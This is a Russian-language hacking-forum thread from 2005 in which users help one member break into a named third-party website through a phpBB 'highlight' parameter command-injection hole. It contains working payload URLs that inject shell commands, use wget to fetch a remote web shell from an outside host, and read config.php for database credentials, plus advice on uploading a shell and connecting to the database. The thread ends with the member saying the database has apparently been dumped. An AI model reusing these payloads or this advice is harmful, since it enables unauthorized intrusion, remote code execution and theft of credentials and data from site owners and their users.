HOME FORUMS MEMBERS RECENT POSTS LOG IN  
× Авторизация
Имя пользователя:
Пароль:
Нет аккаунта? Регистрация
Баннер 1   Баннер 2
НОВЫЕ ТОРГОВАЯ НОВОСТИ ЧАТ
loading...
Скрыть
Вернуться   ANTICHAT > БЕЗОПАСНОСТЬ И УЯЗВИМОСТИ > Уязвимости > Уязвимости CMS / форумов
   
Ответ
 
Опции темы Поиск в этой теме Опции просмотра

  #11  
Старый 13.12.2005, 19:33
qBiN
Постоянный
Регистрация: 20.01.2005
Сообщений: 899
С нами: 11212166

Репутация: 182


По умолчанию

Цитата:
$dbpasswd = ''; )\b#i -неправильный пароль
правильно используй узвимость
какой нах неправильный пароль??
Для юзера vscrk его вопще нет.
 
Ответить с цитированием

  #12  
Старый 14.12.2005, 03:23
temon
Участник форума
Регистрация: 06.02.2005
Сообщений: 130
С нами: 11187283

Репутация: 5
По умолчанию

вот именно. Как не старался пароль вытягивать, видимо база данных без пароля стоит.
Я ТАК думаю что сервак сайта ваще на апаче стоит.



А как подключаться через phpMy Admin ???

Пытаюсь на фтп залазить тоже не получается.
Может можно щелл залить??
v
iewtopic.php?p=1&highlight=%2527.$poster=%60$ls%60 .%2527&ls=wget%20http://xyra.narod.ru/remview.php
viewtopic.php?p=3906&highlight=%2527.$poster=`wget %09http://xyra.narod.ru/remview.php`.%2527
Вот этими пытаюсь нифига не получается.

Короче вот ссылка на форум.
Только пожалуйста не пакостите там, я хочу сам.
Прошу вас.
Вы только помогите мне бд найти.
http://panda.alvisp.ru/pages/forum/viewtopic.php?p=213&highlight=%2527.$poster=%60$ls %60.%2527&ls=id;uname%20-a;cat%20config.php|grep%20db

Последний раз редактировалось temon; 14.12.2005 в 03:33..
 
Ответить с цитированием

  #13  
Старый 14.12.2005, 15:44
qBiN
Постоянный
Регистрация: 20.01.2005
Сообщений: 899
С нами: 11212166

Репутация: 182


По умолчанию

Цитата:
$dbpasswd = '';
Это не кавычка,а 2 апострофа=>пароль для юзера пустой.
Подключись к базе,щас много всяких mysql клиентов.
зы настчет phpmyadmin есть уже тема
 
Ответить с цитированием

  #14  
Старый 15.12.2005, 21:45
Xalegi
Участник форума
Регистрация: 24.11.2004
Сообщений: 126
С нами: 11294246

Репутация: 11
По умолчанию

почитал я туть =)
вот в чём проблема...
правильно начал вроде.
используй &highlight=%2527.$poster=%60$cmd%60.%2527&cmd=ТУ Т_КОМАНДА
в том что у тя не получается залить шелл проверь права папки куда ты пытаешься залить... (следовательно если прав не хватает ставь выставь нужные... chmod 755 papka) (поправте если ошибаюсь) заливаешь шелл...

дык... вообще есть ls -la, cd, шо ещё для счастья нужна? =)
дерзай...

по поводу БД... ммм... как уже заметили есть кууучу клиентов для конекта в БД...
 
Ответить с цитированием

  #15  
Старый 16.12.2005, 10:26
temon
Участник форума
Регистрация: 06.02.2005
Сообщений: 130
С нами: 11187283

Репутация: 5
По умолчанию

бд уже слили кажется )
 
Ответить с цитированием
Ответ



Похожие темы
Тема Автор Раздел Ответов Последнее сообщение
БАЗА ДАННЫХ azeri_hacker Болталка 5 24.03.2005 21:07
Вопрос про базу данных форума Fagot Уязвимости CMS / форумов 9 07.03.2005 17:54



Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT ™ © 2001- Antichat Kft.